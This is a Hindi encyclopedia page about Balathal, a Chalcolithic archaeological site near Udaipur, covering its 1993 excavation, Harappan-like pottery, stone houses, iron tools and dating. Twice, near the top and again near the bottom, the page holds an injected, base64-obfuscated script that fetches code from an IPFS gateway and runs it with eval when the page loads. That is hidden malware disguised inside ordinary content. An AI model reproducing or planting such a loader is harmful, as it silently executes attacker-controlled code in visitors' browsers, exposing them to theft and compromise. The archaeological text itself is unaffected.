बालाथल  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
बालाथल, उदयपुर

बालाथल एक ऐतिहासिक ग्राम जो उदयपुर (राजस्थान) नगर से 42 किमी दक्षिण-पूर्व में वल्लभ नगर तहसील में बालाथल स्थित है।

  • बालाथल ग्राम के पूर्वी छोर पर एक बड़ा टीला है जो लगभग 5 एकड़ क्षेत्र में फैला हुआ है।
  • इस टीले में उत्खनन का कार्य 1993 में वी. एन. मिश्रा के नेतृत्व में हुआ।
  • यहाँ से हड़प्पा संस्कृति के समान ही मृदभाण्ड पाए गए हैं। अतः अनुमान है कि हड़प्पा के लोगों से इनका निकट सम्पर्क रहा होगा।
  • इस क्षेत्र के लोगों ने पत्थर और मिट्टी की ईंटों के बड़े-बड़े मकान बनवा लिए थे।
  • भारत के अन्य ताम्रपाषाणयुगीन स्थलों पर केवल मिट्टी के छोटे मकानों के ही प्रमाण मिले हैं।
  • यहाँ से परिष्कृत मृद्भाण्डों में प्यालियाँ और कटोरियाँ हैं।
  • यहाँ से परवर्ती हड़प्पायुगीन लोहे के औजार भी प्रभूत मात्रा में पाये गये हैं।
  • लोहा गलाने की भट्टियाँ भी प्राप्त हुई हैं।
  • पुरातत्त्ववेत्ताओं ने बालाथल की ताम्रपाषाणयुगीन सभ्यता के मध्य भाग का समय 2350 ई. पू. के आसपास माना है।
  • यदि यह मान लिया जाए तो ऐसा लगता है कि 2700 ई.पू. आस-पास बालाथल में ताम्रपाषाणुयगीन लोगों ने स्थिर जीवन शैली अपना ली होगी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=बालाथल&oldid=287220" से लिया गया